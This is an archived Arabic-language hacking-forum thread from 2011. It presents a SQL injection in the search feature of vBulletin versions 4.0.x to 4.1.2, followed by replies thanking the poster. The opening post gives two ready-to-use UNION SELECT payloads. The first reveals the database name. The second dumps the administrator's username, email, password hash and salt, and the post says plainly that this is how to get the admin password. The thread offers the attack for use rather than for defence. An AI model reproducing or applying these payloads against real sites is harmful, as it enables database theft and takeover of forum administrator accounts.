:: vBspiders Professional Network :: - vBulletin 4.0.x => 4.1.2 SQL Injection Vulnerability

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/forumdisplay.php?f=38)

- - vBulletin 4.0.x => 4.1.2 SQL Injection Vulnerability (http://www.vbspiders.com/vb/showthread.php?t=48021)

KaLa$nikoV

05-22-2011 05:12 AM

vBulletin 4.0.x => 4.1.2 SQL Injection Vulnerability

السلام عليكم ورحمه الله وبركاته

الموضوع واضح من العنوان ثغره في المنتديات اصدار 4 لحتى اصدار 4.1.2

الثغره بمحرك البحث

نروح محرك البحث ونكتب استعلام الحقن

اقتباس:

&cat[0]=1) UNION SELECT database()#

يظهر لنا الداتابيز
وهيك نجيب باس الادمن

اقتباس:

&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#

وهذا فيديو شرح

http://www.youtube.com/watch?v=fR9RGCqIPkc

مكتشف الثغره D4rkB1t

بالتوفيق

Barhom Basri

05-22-2011 06:30 AM

شكراً اخي العزيز

JetLi

05-22-2011 09:26 AM

يسلمووووووووووووووووا ولو انها طريقة متعبة ولكن لا بأس ، مجهود رائع رائع والله الفيبي معذبنا

ChucK NoRRis

05-22-2011 02:04 PM

خطيييييير يا فولكانو !!

ثغرة جديدة تنضاف لثفرات Vbulletin العديدة

dr sow

05-23-2011 10:13 PM

قمة في الابدع فولكانو كما قال الاخ
ال في بي معدبنا

bleu moon

05-25-2011 08:50 PM

مشكوور يا اخي فولكانو وآسف على الغياب، رح اقولك السبب بعدين

silentcntrl

05-25-2011 11:57 PM

شكرا . بارك الله فيك

merci1994

05-26-2011 01:06 AM

يسلموووو يداك يامبدع

الساعة الآن 01:07 AM

[ vBspiders.Com Network ]